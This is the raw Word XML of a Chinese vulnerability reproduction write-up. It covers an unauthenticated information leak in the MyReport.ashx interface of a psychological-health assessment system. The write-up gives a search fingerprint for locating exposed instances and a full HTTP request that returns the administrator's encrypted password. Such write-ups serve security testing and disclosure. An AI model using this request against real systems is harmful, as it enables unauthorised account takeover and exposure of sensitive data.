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1D177" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">5、京师心智心理健康测评系统 MyReport.ashx </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>信息泄露漏洞复现</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F3D643F" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u5fb5f324"/>
      <w:bookmarkStart w:id="1" w:name="u95502ef7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72038059" wp14:editId="0B5FCF92">
            <wp:extent cx="3776133" cy="3173310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2137453329" name="图片 213745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6133" cy="3173310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="213BB090" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="zPCck"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F14415" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="uc9720e75"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>京师心智心理健康测评系统由心理学专家指导研发，使用先进的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，通过一系列的数据处理将人的心理特征数量化，以此来衡量个体心理因素水平以及心理差异，帮助开展标准化心理健康工作。京师心智心理健康测评系统 MyReport.ashx接口存在信息泄露漏洞，未经身份验证的攻击者可以利用此漏洞获取系统后台管理员账户密码凭证，并且解密后可登录后台页面，使系统处于极不安全的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD7CD9" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="uFht2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B528B" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="ue16ba8da"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用以下搜索语法获取测试资产并确定测试目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA83CD" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ae"/>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240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="n8Dtb"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>body="JS/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ligerComboBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ligerTree.js"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF1920" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="udbdd9847"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>步骤二：使用以下数据包获取目标网站的用户与密码信息.....可获取密码的加密值信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D73CFAB" w14:textId="77777777" w:rsidR="005B6761" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ae"/>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2F2F2"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="ow1ih"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&amp;loginName=admin HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E814F" w14:textId="701DF153" w:rsidR="005B6761" w:rsidRDefault="00000000" w:rsidP="00EB087E">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="u3df6b1b3"/>
      <w:bookmarkStart w:id="10" w:name="u13e09eed"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75AAC39E" wp14:editId="331F6B5A">
            <wp:extent cx="5841999" cy="2681284"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="601806877" name="图片 60180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28666" cy="4235652"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="c8owQ"/>
      <w:bookmarkStart w:id="12" w:name="ufd60943f"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:sectPr w:rsidR="005B6761">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5B6761"/>
    <w:rsid w:val="002E1337"/>
    <w:rsid w:val="005B6761"/>
    <w:rsid w:val="00EB0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620E"/>
  <w15:docId w15:val="{E65A9988-1EB5-480E-9799-D49C39CE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宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00841CD9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="38"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00841CD9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00841CD9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00841CD9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>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156082"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156082" w:themeColor="accent1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a9"/>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467886"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156082" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a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鹏 王</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-27T13:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T13:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>